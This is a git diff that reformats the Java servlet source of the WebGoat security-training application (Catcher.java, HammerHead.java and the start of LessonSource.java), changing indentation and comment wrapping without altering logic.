diff --git a/main/project/JavaSource/org/owasp/webgoat/Catcher.java b/main/project/JavaSource/org/owasp/webgoat/Catcher.java
index fdba04082..563a91688 100644
--- a/main/project/JavaSource/org/owasp/webgoat/Catcher.java
+++ b/main/project/JavaSource/org/owasp/webgoat/Catcher.java
@@ -1,121 +1,116 @@
+
 package org.owasp.webgoat;
 
 import java.io.IOException;
 import java.util.Enumeration;
-
 import javax.servlet.ServletException;
 import javax.servlet.http.HttpServletRequest;
 import javax.servlet.http.HttpServletResponse;
-
 import org.owasp.webgoat.lessons.AbstractLesson;
 import org.owasp.webgoat.session.Course;
 import org.owasp.webgoat.session.WebSession;
 
-/*******************************************************************************
+
+/***************************************************************************************************
  * 
  * 
- * This file is part of WebGoat, an Open Web Application Security Project
- * utility. For details, please see http://www.owasp.org/
+ * This file is part of WebGoat, an Open Web Application Security Project utility. For details,
+ * please see http://www.owasp.org/
  * 
  * Copyright (c) 2002 - 2007 Bruce Mayhew
  * 
- * This program is free software; you can redistribute it and/or modify it under
- * the terms of the GNU General Public License as published by the Free Software
- * Foundation; either version 2 of the License, or (at your option) any later
- * version.
+ * This program is free software; you can redistribute it and/or modify it under the terms of the
+ * GNU General Public License as published by the Free Software Foundation; either version 2 of the
+ * License, or (at your option) any later version.
  * 
- * This program is distributed in the hope that it will be useful, but WITHOUT
- * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
- * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
- * details.
+ * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
+ * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
+ * General Public License for more details.
  * 
- * You should have received a copy of the GNU General Public License along with
- * this program; if not, write to the Free Software Foundation, Inc., 59 Temple
- * Place - Suite 330, Boston, MA 02111-1307, USA.
+ * You should have received a copy of the GNU General Public License along with this program; if
+ * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
+ * 02111-1307, USA.
  * 
  * Getting Source ==============
  * 
- * Source for this application is maintained at code.google.com, a repository
- * for free software projects.
+ * Source for this application is maintained at code.google.com, a repository for free software
+ * projects.
  * 
  * For details, please see http://code.google.com/p/webgoat/
- *
- * @author     Bruce Mayhew <a href="http://code.google.com/p/webgoat">WebGoat</a>
- * @created    March 13, 2007
+ * 
+ * @author Bruce Mayhew <a href="http://code.google.com/p/webgoat">WebGoat</a>
+ * @created March 13, 2007
  */
 public class Catcher extends HammerHead
 {
 
-    /**
+	/**
 	 * 
 	 */
 	private static final long serialVersionUID = 7441856110845727651L;
 
 	/**
-     *  Description of the Field
-     */
-    public final static String START_SOURCE_SKIP = "START_OMIT_SOURCE";
+	 * Description of the Field
+	 */
+	public final static String START_SOURCE_SKIP = "START_OMIT_SOURCE";
 
-    public final static String END_SOURCE_SKIP = "END_OMIT_SOURCE";
+	public final static String END_SOURCE_SKIP = "END_OMIT_SOURCE";
 
-    public static final String PROPERTY = "PROPERTY";
+	public static final String PROPERTY = "PROPERTY";
 
-    public static final String EMPTY_STRING = "";
+	public static final String EMPTY_STRING = "";
 
-
-    /**
-     *  Description of the Method
-     *
-     * @param  request               Description of the Parameter
-     * @param  response              Description of the Parameter
-     * @exception  IOException       Description of the Exception
-     * @exception  ServletException  Description of the Exception
-     */
-    public void doPost(HttpServletRequest request, HttpServletResponse response)
-	    throws IOException, ServletException
-    {
+	/**
+	 * Description of the Method
+	 * 
+	 * @param request
+	 *            Description of the Parameter
+	 * @param response
+	 *            Description of the Parameter
+	 * @exception IOException
+	 *                Description of the Exception
+	 * @exception ServletException
+	 *                Description of the Exception
+	 */
+	public void doPost(HttpServletRequest request, HttpServletResponse response) throws IOException, ServletException
+	{
 		try
 		{
-		    //System.out.println( "Entering doPost: " );
-		    //System.out.println( "	- request "   + request);
-		    //System.out.println( "	- principle: "   + request.getUserPrincipal() );
-		    //setCacheHeaders(response, 0);
-		    WebSession session = (WebSession) request.getSession(true)
-			    .getAttribute(WebSession.SESSION);
-		    session.update(request, response, this.getServletName()); // FIXME: Too much in this call.
-	
-		    int scr = session.getCurrentScreen();
-		    Course course = session.getCourse();
-		    AbstractLesson lesson = course.getLesson(session, scr,
-			    AbstractLesson.USER_ROLE);
+			// System.out.println( "Entering doPost: " );
+			// System.out.println( " - request " + request);
+			// System.out.println( " - principle: " + request.getUserPrincipal() );
+			// setCacheHeaders(response, 0);
+			WebSession session = (WebSession) request.getSession(true).getAttribute(WebSession.SESSION);
+			session.update(request, response, this.getServletName()); // FIXME: Too much in this
+																		// call.
 
-		    log(request, lesson.getClass().getName() + " | "
-				    + session.getParser().toString());
-		    
-		    String property = new String(session.getParser().getStringParameter(
-				    PROPERTY, EMPTY_STRING));
-		    
-		    // if the PROPERTY parameter is available - write all the parameters to the 
-		    // property file.  No other control parameters are supported at this time.
-		    if ( !property.equals(EMPTY_STRING))
-		    {
-		    	Enumeration e = session.getParser().getParameterNames();
+			int scr = session.getCurrentScreen();
+			Course course = session.getCourse();
+			AbstractLesson lesson = course.getLesson(session, scr, AbstractLesson.USER_ROLE);
 
-		    	while (e.hasMoreElements())
-		    	{
-		    	    String name = (String) e.nextElement();
-		    	    String value= session.getParser().getParameterValues(name)[0];
-				    lesson.getLessonTracker(session).getLessonProperties().setProperty(
-						    name, value);
-		    	}
-		    }	    
-		    lesson.getLessonTracker(session).store(session, lesson);
-		    
-		}
-		catch (Throwable t)
+			log(request, lesson.getClass().getName() + " | " + session.getParser().toString());
+
+			String property = new String(session.getParser().getStringParameter(PROPERTY, EMPTY_STRING));
+
+			// if the PROPERTY parameter is available - write all the parameters to the
+			// property file. No other control parameters are supported at this time.
+			if (!property.equals(EMPTY_STRING))
+			{
+				Enumeration e = session.getParser().getParameterNames();
+
+				while (e.hasMoreElements())
+				{
+					String name = (String) e.nextElement();
+					String value = session.getParser().getParameterValues(name)[0];
+					lesson.getLessonTracker(session).getLessonProperties().setProperty(name, value);
+				}
+			}
+			lesson.getLessonTracker(session).store(session, lesson);
+
+		} catch (Throwable t)
 		{
-		    t.printStackTrace();
-		    log("ERROR: " + t);
+			t.printStackTrace();
+			log("ERROR: " + t);
 		}
-    }
+	}
 }
diff --git a/main/project/JavaSource/org/owasp/webgoat/HammerHead.java b/main/project/JavaSource/org/owasp/webgoat/HammerHead.java
index 0e3f8d6a9..09a3afd05 100644
--- a/main/project/JavaSource/org/owasp/webgoat/HammerHead.java
+++ b/main/project/JavaSource/org/owasp/webgoat/HammerHead.java
@@ -1,3 +1,4 @@
+
 package org.owasp.webgoat;
 
 import java.io.IOException;
@@ -6,14 +7,12 @@ import java.text.SimpleDateFormat;
 import java.util.Date;
 import java.util.Locale;
 import java.util.TimeZone;
-
 import javax.servlet.ServletContext;
 import javax.servlet.ServletException;
 import javax.servlet.http.HttpServlet;
 import javax.servlet.http.HttpServletRequest;
 import javax.servlet.http.HttpServletResponse;
 import javax.servlet.http.HttpSession;
-
 import org.owasp.webgoat.lessons.AbstractLesson;
 import org.owasp.webgoat.lessons.WelcomeScreen;
 import org.owasp.webgoat.lessons.admin.WelcomeAdminScreen;
@@ -24,32 +23,31 @@ import org.owasp.webgoat.session.UserTracker;
 import org.owasp.webgoat.session.WebSession;
 import org.owasp.webgoat.session.WebgoatContext;
 
-/*******************************************************************************
+
+/***************************************************************************************************
  * 
  * 
- * This file is part of WebGoat, an Open Web Application Security Project
- * utility. For details, please see http://www.owasp.org/
+ * This file is part of WebGoat, an Open Web Application Security Project utility. For details,
+ * please see http://www.owasp.org/
  * 
  * Copyright (c) 2002 - 2007 Bruce Mayhew
  * 
- * This program is free software; you can redistribute it and/or modify it under
- * the terms of the GNU General Public License as published by the Free Software
- * Foundation; either version 2 of the License, or (at your option) any later
- * version.
+ * This program is free software; you can redistribute it and/or modify it under the terms of the
+ * GNU General Public License as published by the Free Software Foundation; either version 2 of the
+ * License, or (at your option) any later version.
  * 
- * This program is distributed in the hope that it will be useful, but WITHOUT
- * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
- * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
- * details.
+ * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
+ * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
+ * General Public License for more details.
  * 
- * You should have received a copy of the GNU General Public License along with
- * this program; if not, write to the Free Software Foundation, Inc., 59 Temple
- * Place - Suite 330, Boston, MA 02111-1307, USA.
+ * You should have received a copy of the GNU General Public License along with this program; if
+ * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
+ * 02111-1307, USA.
  * 
  * Getting Source ==============
  * 
- * Source for this application is maintained at code.google.com, a repository
- * for free software projects.
+ * Source for this application is maintained at code.google.com, a repository for free software
+ * projects.
  * 
  * For details, please see http://code.google.com/p/webgoat/
  * 
@@ -61,450 +59,420 @@ import org.owasp.webgoat.session.WebgoatContext;
 public class HammerHead extends HttpServlet
 {
 
-    /**
+	/**
 	 * 
 	 */
 	private static final long serialVersionUID = 645640331343188020L;
 
 	/**
-     * Description of the Field
-     */
-    protected static SimpleDateFormat httpDateFormat;
+	 * Description of the Field
+	 */
+	protected static SimpleDateFormat httpDateFormat;
 
-    /**
-     * Set the session timeout to be 2 days
-     */
-    private final static int sessionTimeoutSeconds = 60 * 60 * 24 * 2;
+	/**
+	 * Set the session timeout to be 2 days
+	 */
+	private final static int sessionTimeoutSeconds = 60 * 60 * 24 * 2;
 
-    // private final static int sessionTimeoutSeconds = 1;
+	// private final static int sessionTimeoutSeconds = 1;
 
-    /**
-     * Properties file path
-     */
-    public static String propertiesPath = null;
+	/**
+	 * Properties file path
+	 */
+	public static String propertiesPath = null;
 
-    /**
-     * provides convenience methods for getting setup information 
-     * from the ServletContext
-     */
-    private WebgoatContext webgoatContext = null;
-    
+	/**
+	 * provides convenience methods for getting setup information from the ServletContext
+	 */
+	private WebgoatContext webgoatContext = null;
 
-    /**
-     * Description of the Method
-     * 
-     * @param request
-     *        Description of the Parameter
-     * @param response
-     *        Description of the Parameter
-     * @exception IOException
-     *            Description of the Exception
-     * @exception ServletException
-     *            Description of the Exception
-     */
-    public void doGet(HttpServletRequest request, HttpServletResponse response)
-	    throws IOException, ServletException
-    {
-	doPost(request, response);
-    }
-
-
-    /**
-     * Description of the Method
-     * 
-     * @param request
-     *        Description of the Parameter
-     * @param response
-     *        Description of the Parameter
-     * @exception IOException
-     *            Description of the Exception
-     * @exception ServletException
-     *            Description of the Exception
-     */
-    public void doPost(HttpServletRequest request, HttpServletResponse response)
-	    throws IOException, ServletException
-    {
-	Screen screen = null;
-
-	WebSession mySession = null;
-	try
+	/**
+	 * Description of the Method
+	 * 
+	 * @param request
+	 *            Description of the Parameter
+	 * @param response
+	 *            Description of the Parameter
+	 * @exception IOException
+	 *                Description of the Exception
+	 * @exception ServletException
+	 *                Description of the Exception
+	 */
+	public void doGet(HttpServletRequest request, HttpServletResponse response) throws IOException, ServletException
 	{
-	    // System.out.println( "HH Entering doPost: " );
-	    // System.out.println( " - HH request " + request);
-	    // System.out.println( " - HH principle: " +
-	    // request.getUserPrincipal() );
-	    // setCacheHeaders(response, 0);
-	    ServletContext context = getServletContext();
-
-	    // FIXME: If a response is written by updateSession(), do not
-	    // call makeScreen() and writeScreen()
-	    mySession = updateSession(request, response, context);
-	    if (response.isCommitted())
-		return;
-
-	    // Note: For the lesson to track the status, we need to update
-	    // the lesson tracker object
-	    // from the screen.createContent() method. The create content is
-	    // the only point
-	    // where the lesson "knows" what has happened. To track it at a
-	    // latter point would
-	    // require the lesson to have memory.
-	    screen = makeScreen(mySession); // This calls the lesson's
-	    // handleRequest()
-	    if (response.isCommitted())
-		return;
-
-	    // perform lesson-specific tracking activities
-	    if (screen instanceof AbstractLesson) {
-	    	AbstractLesson lesson = (AbstractLesson) screen;
-	    	
-		    // we do not count the initial display of the lesson screen as a visit
-		    if ("GET".equals(request.getMethod())) {
-		    	String uri = request.getRequestURI() + "?" + request.getQueryString();
-		    	if (! uri.endsWith(lesson.getLink()))
-		    		screen.getLessonTracker(mySession).incrementNumVisits();
-		    } else if ("POST".equals(request.getMethod()) && mySession.getPreviousScreen() == mySession.getCurrentScreen()) {
-			    screen.getLessonTracker(mySession).incrementNumVisits();
-		    }
-	    }
-
-	    // log the access to this screen for this user
-	    UserTracker userTracker = UserTracker.instance();
-	    userTracker.update(mySession, screen);
-	    log(request, screen.getClass().getName() + " | "
-		    + mySession.getParser().toString());
-
-	    // Redirect the request to our View servlet
-	    String userAgent = request.getHeader("user-agent");
-	    String clientBrowser = "Not known!";
-	    if (userAgent != null)
-	    {
-		clientBrowser = userAgent;
-	    }
-	    request.setAttribute("client.browser", clientBrowser);
-	    request.getSession().setAttribute("websession", mySession);
-	    request.getSession().setAttribute("course", mySession.getCourse());
-
-	    request.getRequestDispatcher(getViewPage(mySession)).forward(
-		    request, response);
+		doPost(request, response);
 	}
-	catch (Throwable t)
+
+	/**
+	 * Description of the Method
+	 * 
+	 * @param request
+	 *            Description of the Parameter
+	 * @param response
+	 *            Description of the Parameter
+	 * @exception IOException
+	 *                Description of the Exception
+	 * @exception ServletException
+	 *                Description of the Exception
+	 */
+	public void doPost(HttpServletRequest request, HttpServletResponse response) throws IOException, ServletException
 	{
-	    t.printStackTrace();
-	    log("ERROR: " + t);
-	    screen = new ErrorScreen(mySession, t);
-	}
-	finally
-	{
-	    try
-	    {
-		this.writeScreen(mySession, screen, response);
-	    }
-	    catch (Throwable thr)
-	    {
-		thr.printStackTrace();
-		log(request, "Could not write error screen: "
-			+ thr.getMessage());
-	    }
-    	WebSession.returnConnection(mySession);
-	    // System.out.println( "HH Leaving doPost: " );
-	}
-    }
+		Screen screen = null;
 
-
-    private String getViewPage(WebSession webSession)
-    {
-	String page;
-
-	// If this session has not seen the landing page yet, go there instead.
-	HttpSession session = webSession.getRequest().getSession();
-	if (session.getAttribute("welcomed") == null)
-	{
-	    session.setAttribute("welcomed", "true");
-	    page = "/webgoat.jsp";
-	}
-	else
-	    page = "/main.jsp";
-
-	return page;
-    }
-
-    /**
-     * Description of the Method
-     * 
-     * @param date
-     *        Description of the Parameter
-     * @return RFC 1123 http date format
-     */
-    protected static String formatHttpDate(Date date)
-    {
-	synchronized (httpDateFormat)
-	{
-	    return httpDateFormat.format(date);
-	}
-    }
-
-
-    /**
-     * Return information about this servlet
-     * 
-     * @return The servletInfo value
-     */
-    public String getServletInfo()
-    {
-	return "WebGoat is sponsored by Aspect Security.";
-    }
-
-
-    /**
-     * Return properties path
-     * 
-     * @return servlet context path + WEB_INF
-     */
-    public void init() throws ServletException
-    {
-	httpDateFormat = new SimpleDateFormat("EEE, dd MMM yyyyy HH:mm:ss z",
-		Locale.US);
-	httpDateFormat.setTimeZone(TimeZone.getTimeZone("GMT"));
-	propertiesPath = getServletContext().getRealPath(
-		"./WEB-INF/webgoat.properties");
-	webgoatContext = new WebgoatContext(this);
-    }
-
-
-    /**
-     * Description of the Method
-     * 
-     * @param request
-     *        Description of the Parameter
-     * @param message
-     *        Description of the Parameter
-     */
-    public void log(HttpServletRequest request, String message)
-    {
-	String output = new Date() + " | " + request.getRemoteHost() + ":"
-		+ request.getRemoteAddr() + " | " + message;
-	log(output);
-	System.out.println(output);
-    }
-
-    /*
-     * public List getLessons(Category category, String role) { Course
-     * course = mySession.getCourse(); // May need to clone the List before
-     * returning it. //return new ArrayList(course.getLessons(category,
-     * role)); return course.getLessons(category, role); }
-     */
-
-    /**
-     * Description of the Method
-     * 
-     * @param s
-     *        Description of the Parameter
-     * @return Description of the Return Value
-     */
-    protected Screen makeScreen(WebSession s)
-    {
-	Screen screen = null;
-	int scr = s.getCurrentScreen();
-	Course course = s.getCourse();
-
-	if (s.isUser() || s.isChallenge())
-	{
-	    if (scr == WebSession.WELCOME)
-	    {
-		screen = new WelcomeScreen(s);
-	    }
-	    else
-	    {
-		AbstractLesson lesson = course.getLesson(s, scr,
-			AbstractLesson.USER_ROLE);
-		if (lesson == null && s.isHackedAdmin())
+		WebSession mySession = null;
+		try
 		{
-		    // If admin was hacked, let the user see some of the
-		    // admin screens
-		    lesson = course.getLesson(s, scr,
-			    AbstractLesson.HACKED_ADMIN_ROLE);
+			// System.out.println( "HH Entering doPost: " );
+			// System.out.println( " - HH request " + request);
+			// System.out.println( " - HH principle: " +
+			// request.getUserPrincipal() );
+			// setCacheHeaders(response, 0);
+			ServletContext context = getServletContext();
+
+			// FIXME: If a response is written by updateSession(), do not
+			// call makeScreen() and writeScreen()
+			mySession = updateSession(request, response, context);
+			if (response.isCommitted()) return;
+
+			// Note: For the lesson to track the status, we need to update
+			// the lesson tracker object
+			// from the screen.createContent() method. The create content is
+			// the only point
+			// where the lesson "knows" what has happened. To track it at a
+			// latter point would
+			// require the lesson to have memory.
+			screen = makeScreen(mySession); // This calls the lesson's
+			// handleRequest()
+			if (response.isCommitted()) return;
+
+			// perform lesson-specific tracking activities
+			if (screen instanceof AbstractLesson)
+			{
+				AbstractLesson lesson = (AbstractLesson) screen;
+
+				// we do not count the initial display of the lesson screen as a visit
+				if ("GET".equals(request.getMethod()))
+				{
+					String uri = request.getRequestURI() + "?" + request.getQueryString();
+					if (!uri.endsWith(lesson.getLink())) screen.getLessonTracker(mySession).incrementNumVisits();
+				}
+				else if ("POST".equals(request.getMethod())
+						&& mySession.getPreviousScreen() == mySession.getCurrentScreen())
+				{
+					screen.getLessonTracker(mySession).incrementNumVisits();
+				}
+			}
+
+			// log the access to this screen for this user
+			UserTracker userTracker = UserTracker.instance();
+			userTracker.update(mySession, screen);
+			log(request, screen.getClass().getName() + " | " + mySession.getParser().toString());
+
+			// Redirect the request to our View servlet
+			String userAgent = request.getHeader("user-agent");
+			String clientBrowser = "Not known!";
+			if (userAgent != null)
+			{
+				clientBrowser = userAgent;
+			}
+			request.setAttribute("client.browser", clientBrowser);
+			request.getSession().setAttribute("websession", mySession);
+			request.getSession().setAttribute("course", mySession.getCourse());
+
+			request.getRequestDispatcher(getViewPage(mySession)).forward(request, response);
+		} catch (Throwable t)
+		{
+			t.printStackTrace();
+			log("ERROR: " + t);
+			screen = new ErrorScreen(mySession, t);
+		} finally
+		{
+			try
+			{
+				this.writeScreen(mySession, screen, response);
+			} catch (Throwable thr)
+			{
+				thr.printStackTrace();
+				log(request, "Could not write error screen: " + thr.getMessage());
+			}
+			WebSession.returnConnection(mySession);
+			// System.out.println( "HH Leaving doPost: " );
+		}
+	}
+
+	private String getViewPage(WebSession webSession)
+	{
+		String page;
+
+		// If this session has not seen the landing page yet, go there instead.
+		HttpSession session = webSession.getRequest().getSession();
+		if (session.getAttribute("welcomed") == null)
+		{
+			session.setAttribute("welcomed", "true");
+			page = "/webgoat.jsp";
+		}
+		else
+			page = "/main.jsp";
+
+		return page;
+	}
+
+	/**
+	 * Description of the Method
+	 * 
+	 * @param date
+	 *            Description of the Parameter
+	 * @return RFC 1123 http date format
+	 */
+	protected static String formatHttpDate(Date date)
+	{
+		synchronized (httpDateFormat)
+		{
+			return httpDateFormat.format(date);
+		}
+	}
+
+	/**
+	 * Return information about this servlet
+	 * 
+	 * @return The servletInfo value
+	 */
+	public String getServletInfo()
+	{
+		return "WebGoat is sponsored by Aspect Security.";
+	}
+
+	/**
+	 * Return properties path
+	 * 
+	 * @return servlet context path + WEB_INF
+	 */
+	public void init() throws ServletException
+	{
+		httpDateFormat = new SimpleDateFormat("EEE, dd MMM yyyyy HH:mm:ss z", Locale.US);
+		httpDateFormat.setTimeZone(TimeZone.getTimeZone("GMT"));
+		propertiesPath = getServletContext().getRealPath("./WEB-INF/webgoat.properties");
+		webgoatContext = new WebgoatContext(this);
+	}
+
+	/**
+	 * Description of the Method
+	 * 
+	 * @param request
+	 *            Description of the Parameter
+	 * @param message
+	 *            Description of the Parameter
+	 */
+	public void log(HttpServletRequest request, String message)
+	{
+		String output = new Date() + " | " + request.getRemoteHost() + ":" + request.getRemoteAddr() + " | " + message;
+		log(output);
+		System.out.println(output);
+	}
+
+	/*
+	 * public List getLessons(Category category, String role) { Course course =
+	 * mySession.getCourse(); // May need to clone the List before returning it. //return new
+	 * ArrayList(course.getLessons(category, role)); return course.getLessons(category, role); }
+	 */
+
+	/**
+	 * Description of the Method
+	 * 
+	 * @param s
+	 *            Description of the Parameter
+	 * @return Description of the Return Value
+	 */
+	protected Screen makeScreen(WebSession s)
+	{
+		Screen screen = null;
+		int scr = s.getCurrentScreen();
+		Course course = s.getCourse();
+
+		if (s.isUser() || s.isChallenge())
+		{
+			if (scr == WebSession.WELCOME)
+			{
+				screen = new WelcomeScreen(s);
+			}
+			else
+			{
+				AbstractLesson lesson = course.getLesson(s, scr, AbstractLesson.USER_ROLE);
+				if (lesson == null && s.isHackedAdmin())
+				{
+					// If admin was hacked, let the user see some of the
+					// admin screens
+					lesson = course.getLesson(s, scr, AbstractLesson.HACKED_ADMIN_ROLE);
+				}
+
+				if (lesson != null)
+				{
+					screen = lesson;
+
+					// We need to do some bookkeeping for the hackable admin
+					// interface.
+					// This is the only place we can tell if the user
+					// successfully hacked the hackable
+					// admin and has actually accessed an admin screen. You
+					// need BOTH pieces of information
+					// in order to satisfy the remote admin lesson.
+
+					s.setHasHackableAdmin(screen.getRole());
+
+					lesson.handleRequest(s);
+					s.setCurrentMenu(lesson.getCategory().getRanking());
+				}
+				else
+				{
+					screen = new ErrorScreen(s, "Invalid screen requested.  Try: http://localhost/WebGoat/attack");
+				}
+			}
+		}
+		else if (s.isAdmin())
+		{
+			if (scr == WebSession.WELCOME)
+			{
+				screen = new WelcomeAdminScreen(s);
+			}
+			else
+			{
+				// Admin can see all roles.
+				// FIXME: should be able to pass a list of roles.
+				AbstractLesson lesson = course.getLesson(s, scr, AbstractLesson.ADMIN_ROLE);
+				if (lesson == null)
+				{
+					lesson = course.getLesson(s, scr, AbstractLesson.HACKED_ADMIN_ROLE);
+				}
+				if (lesson == null)
+				{
+					lesson = course.getLesson(s, scr, AbstractLesson.USER_ROLE);
+				}
+
+				if (lesson != null)
+				{
+					screen = lesson;
+
+					// We need to do some bookkeeping for the hackable admin
+					// interface.
+					// This is the only place we can tell if the user
+					// successfully hacked the hackable
+					// admin and has actually accessed an admin screen. You
+					// need BOTH pieces of information
+					// in order to satisfy the remote admin lesson.
+
+					s.setHasHackableAdmin(screen.getRole());
+
+					lesson.handleRequest(s);
+					s.setCurrentMenu(lesson.getCategory().getRanking());
+				}
+				else
+				{
+					screen = new ErrorScreen(s,
+							"Invalid screen requested.  Try Setting Admin to false or Try: http://localhost/WebGoat/attack");
+				}
+			}
 		}
 
-		if (lesson != null)
+		return (screen);
+	}
+
+	/**
+	 * This method sets the required expiration headers in the response for a given RunData object.
+	 * This method attempts to set all relevant headers, both for HTTP 1.0 and HTTP 1.1.
+	 * 
+	 * @param response
+	 *            The new cacheHeaders value
+	 * @param expiry
+	 *            The new cacheHeaders value
+	 */
+	protected static void setCacheHeaders(HttpServletResponse response, int expiry)
+	{
+		if (expiry == 0)
 		{
-		    screen = lesson;
-
-		    // We need to do some bookkeeping for the hackable admin
-		    // interface.
-		    // This is the only place we can tell if the user
-		    // successfully hacked the hackable
-		    // admin and has actually accessed an admin screen. You
-		    // need BOTH pieces of information
-		    // in order to satisfy the remote admin lesson.
-
-		    s.setHasHackableAdmin(screen.getRole());
-
-		    lesson.handleRequest(s);
-		    s.setCurrentMenu(lesson.getCategory().getRanking());
+			response.setHeader("Pragma", "no-cache");
+			response.setHeader("Cache-Control", "no-cache");
+			response.setHeader("Expires", formatHttpDate(new Date()));
 		}
 		else
 		{
-		    screen = new ErrorScreen(s,
-			    "Invalid screen requested.  Try: http://localhost/WebGoat/attack");
+			Date expiryDate = new Date(System.currentTimeMillis() + expiry);
+			response.setHeader("Expires", formatHttpDate(expiryDate));
 		}
-	    }
 	}
-	else if (s.isAdmin())
+
+	/**
+	 * Description of the Method
+	 * 
+	 * @param request
+	 *            Description of the Parameter
+	 * @param response
+	 *            Description of the Parameter
+	 * @param context
+	 *            Description of the Parameter
+	 * @return Description of the Return Value
+	 */
+	protected WebSession updateSession(HttpServletRequest request, HttpServletResponse response, ServletContext context)
+			throws IOException
 	{
-	    if (scr == WebSession.WELCOME)
-	    {
-		screen = new WelcomeAdminScreen(s);
-	    }
-	    else
-	    {
-		// Admin can see all roles.
-		// FIXME: should be able to pass a list of roles.
-		AbstractLesson lesson = course.getLesson(s, scr,
-			AbstractLesson.ADMIN_ROLE);
-		if (lesson == null)
+		HttpSession hs;
+		hs = request.getSession(true);
+
+		// System.out.println( "HH Entering Session_id: " + hs.getId() );
+		// dumpSession( hs );
+		// Get our session object out of the HTTP session
+		WebSession session = null;
+		Object o = hs.getAttribute(WebSession.SESSION);
+
+		if ((o != null) && o instanceof WebSession)
 		{
-		    lesson = course.getLesson(s, scr,
-			    AbstractLesson.HACKED_ADMIN_ROLE);
-		}
-		if (lesson == null)
-		{
-		    lesson = course.getLesson(s, scr, AbstractLesson.USER_ROLE);
-		}
-
-		if (lesson != null)
-		{
-		    screen = lesson;
-
-		    // We need to do some bookkeeping for the hackable admin
-		    // interface.
-		    // This is the only place we can tell if the user
-		    // successfully hacked the hackable
-		    // admin and has actually accessed an admin screen. You
-		    // need BOTH pieces of information
-		    // in order to satisfy the remote admin lesson.
-
-		    s.setHasHackableAdmin(screen.getRole());
-
-		    lesson.handleRequest(s);
-		    s.setCurrentMenu(lesson.getCategory().getRanking());
+			session = (WebSession) o;
 		}
 		else
 		{
-		    screen = new ErrorScreen(
-			    s,
-			    "Invalid screen requested.  Try Setting Admin to false or Try: http://localhost/WebGoat/attack");
+			// Create new custom session and save it in the HTTP session
+			// System.out.println( "HH Creating new WebSession: " );
+			session = new WebSession(webgoatContext, context);
+			hs.setAttribute(WebSession.SESSION, session);
+			// reset timeout
+			hs.setMaxInactiveInterval(sessionTimeoutSeconds);
+
 		}
-	    }
+
+		session.update(request, response, this.getServletName());
+
+		// to authenticate
+		// System.out.println( "HH Leaving Session_id: " + hs.getId() );
+		// dumpSession( hs );
+		return (session);
 	}
 
-	return (screen);
-    }
-
-
-    /**
-     * This method sets the required expiration headers in the response for
-     * a given RunData object. This method attempts to set all relevant
-     * headers, both for HTTP 1.0 and HTTP 1.1.
-     * 
-     * @param response
-     *        The new cacheHeaders value
-     * @param expiry
-     *        The new cacheHeaders value
-     */
-    protected static void setCacheHeaders(HttpServletResponse response,
-	    int expiry)
-    {
-	if (expiry == 0)
+	/**
+	 * Description of the Method
+	 * 
+	 * @param s
+	 *            Description of the Parameter
+	 * @param response
+	 *            Description of the Parameter
+	 * @exception IOException
+	 *                Description of the Exception
+	 */
+	protected void writeScreen(WebSession s, Screen screen, HttpServletResponse response) throws IOException
 	{
-	    response.setHeader("Pragma", "no-cache");
-	    response.setHeader("Cache-Control", "no-cache");
-	    response.setHeader("Expires", formatHttpDate(new Date()));
+		response.setContentType("text/html");
+
+		PrintWriter out = response.getWriter();
+
+		if (s == null)
+		{
+			screen = new ErrorScreen(s, "Page to display was null");
+		}
+
+		// set the content-length of the response.
+		// Trying to avoid chunked-encoding. (Aspect required)
+		response.setContentLength(screen.getContentLength());
+		response.setHeader("Content-Length", screen.getContentLength() + "");
+
+		screen.output(out);
+		out.close();
 	}
-	else
-	{
-	    Date expiryDate = new Date(System.currentTimeMillis() + expiry);
-	    response.setHeader("Expires", formatHttpDate(expiryDate));
-	}
-    }
-
-
-    /**
-     * Description of the Method
-     * 
-     * @param request
-     *        Description of the Parameter
-     * @param response
-     *        Description of the Parameter
-     * @param context
-     *        Description of the Parameter
-     * @return Description of the Return Value
-     */
-    protected WebSession updateSession(HttpServletRequest request,
-	    HttpServletResponse response, ServletContext context)
-	    throws IOException
-    {
-	HttpSession hs;
-	hs = request.getSession(true);
-
-	// System.out.println( "HH Entering Session_id: " + hs.getId() );
-	// dumpSession( hs );
-	// Get our session object out of the HTTP session
-	WebSession session = null;
-	Object o = hs.getAttribute(WebSession.SESSION);
-
-	if ((o != null) && o instanceof WebSession)
-	{
-	    session = (WebSession) o;
-	}
-	else
-	{
-	    // Create new custom session and save it in the HTTP session
-	    // System.out.println( "HH Creating new WebSession: " );
-	    session = new WebSession(webgoatContext, context);
-	    hs.setAttribute(WebSession.SESSION, session);
-	    // reset timeout
-	    hs.setMaxInactiveInterval(sessionTimeoutSeconds);
-
-	}
-
-	session.update(request, response, this.getServletName());
-
-	// to authenticate
-	// System.out.println( "HH Leaving Session_id: " + hs.getId() );
-	// dumpSession( hs );
-	return (session);
-    }
-
-
-    /**
-     * Description of the Method
-     * 
-     * @param s
-     *        Description of the Parameter
-     * @param response
-     *        Description of the Parameter
-     * @exception IOException
-     *            Description of the Exception
-     */
-    protected void writeScreen(WebSession s, Screen screen, HttpServletResponse response)
-	    throws IOException
-    {
-	response.setContentType("text/html");
-
-	PrintWriter out = response.getWriter();
-
-	if (s == null)
-	{
-	    screen = new ErrorScreen(s, "Page to display was null");
-	}
-
-	// set the content-length of the response.
-	// Trying to avoid chunked-encoding. (Aspect required)
-	response.setContentLength(screen.getContentLength());
-	response.setHeader("Content-Length", screen.getContentLength() + "");
-
-	screen.output(out);
-	out.close();
-    }
 }
diff --git a/main/project/JavaSource/org/owasp/webgoat/LessonSource.java b/main/project/JavaSource/org/owasp/webgoat/LessonSource.java
index f4043bace..20f4c1dc5 100644
--- a/main/project/JavaSource/org/owasp/webgoat/LessonSource.java
+++ b/main/project/JavaSource/org/owasp/webgoat/LessonSource.java
@@ -1,42 +1,40 @@
+
 package org.owasp.webgoat;
 
 import java.io.IOException;
 import java.io.PrintWriter;
-
 import javax.servlet.ServletException;
 import javax.servlet.http.HttpServletRequest;
